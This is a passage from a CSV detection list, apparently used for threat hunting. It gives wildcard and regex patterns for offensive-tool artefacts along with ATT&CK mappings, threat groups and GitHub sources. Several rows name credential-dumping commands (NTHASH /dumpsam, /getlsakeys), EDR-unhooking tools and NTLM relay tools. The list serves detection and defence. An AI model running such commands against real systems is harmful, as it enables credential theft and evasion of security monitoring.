menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*ntcreatethread.x86*",".{0,1000}ntcreatethread\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*NtCreateUserProcessShellcode*",".{0,1000}NtCreateUserProcessShellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*ntdissector -*",".{0,1000}ntdissector\s\-.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*ntdissector-main*",".{0,1000}ntdissector\-main.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*Ntdll_SusProcess.*",".{0,1000}Ntdll_SusProcess\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*NTDLLReflection-main*",".{0,1000}NTDLLReflection\-main.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*NtdllUnpatcher.cpp*",".{0,1000}NtdllUnpatcher\.cpp.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.dll*",".{0,1000}NtdllUnpatcher\.dll.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.lib*",".{0,1000}NtdllUnpatcher\.lib.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.log*",".{0,1000}NtdllUnpatcher\.log.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.obj*",".{0,1000}NtdllUnpatcher\.obj.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher.sln*",".{0,1000}NtdllUnpatcher\.sln.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher_Injector*",".{0,1000}NtdllUnpatcher_Injector.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*NtdllUnpatcher-master*",".{0,1000}NtdllUnpatcher\-master.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*ntds/ntds.py*",".{0,1000}ntds\/ntds\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*ntds_grabber.md*",".{0,1000}ntds_grabber\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ntdsdump.exe*",".{0,1000}ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*NTDSgrab.ps1*",".{0,1000}NTDSgrab\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ntfs-read.py*",".{0,1000}ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*",".{0,1000}nth\s\-\-text\s5f4dcc3b5aa765d61d8327deb882cf99.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*NTHASH /enumproc *",".{0,1000}NTHASH\s\/enumproc\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runas *",".{0,1000}NTHASH\s\/runas\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runaschild /pid*",".{0,1000}NTHASH\s\/runaschild\s\/pid.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runastoken *",".{0,1000}NTHASH\s\/runastoken\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH /runwmi *",".{0,1000}NTHASH\s\/runwmi\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /cryptunprotectdata /binary:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /cryptunprotectdata /input:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /dumpsam*",".{0,1000}NTHASH.{0,1000}\s\/dumpsam.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /enumcred*",".{0,1000}NTHASH.{0,1000}\s\/enumcred.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /enumvault*",".{0,1000}NTHASH.{0,1000}\s\/enumvault.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /getlsakeys*",".{0,1000}NTHASH.{0,1000}\s\/getlsakeys.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH* /wlansvc /binary:*",".{0,1000}NTHASH.{0,1000}\s\/wlansvc\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH-win32.exe*",".{0,1000}NTHASH\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*NTHASH-win64.exe*",".{0,1000}NTHASH\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*ntlm.py *",".{0,1000}ntlm\.py\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ntlm_info_enumeration.*",".{0,1000}ntlm_info_enumeration\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NTLMChallengeBase64*",".{0,1000}NTLMChallengeBase64.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*NTLMChallengeBase64*",".{0,1000}NTLMChallengeBase64.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ntlm-info.py*",".{0,1000}ntlm\-info\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*NTLMInjector.ps1*",".{0,1000}NTLMInjector\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*ntlmquic.*",".{0,1000}ntlmquic\..{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmquic-go*",".{0,1000}ntlmquic\-go.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmquic-master*",".{0,1000}ntlmquic\-master.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*ntlmrecon *",".{0,1000}ntlmrecon\s.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*ntlmrecon.csv*",".{0,1000}ntlmrecon\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*ntlmrecon:main*",".{0,1000}ntlmrecon\:main.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*ntlmrecon-fromfile.csv*",".{0,1000}ntlmrecon\-fromfile\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*NTLMRecon-master*",".{0,1000}NTLMRecon\-master.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*ntlmrecon-ranges.csv*",".{0,1000}ntlmrecon\-ranges\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*NTLMRelay2Self.git*",".{0,1000}NTLMRelay2Self\.git.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*ntlmRelayToEWS -*",".{0,1000}ntlmRelayToEWS\s\-.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*ntlmRelayToEWS.py*",".{0,1000}ntlmRelayToEWS\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*NtlmRelayToEWS-master*",".{0,1000}NtlmRelayToEWS\-master.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*ntlmrelayx 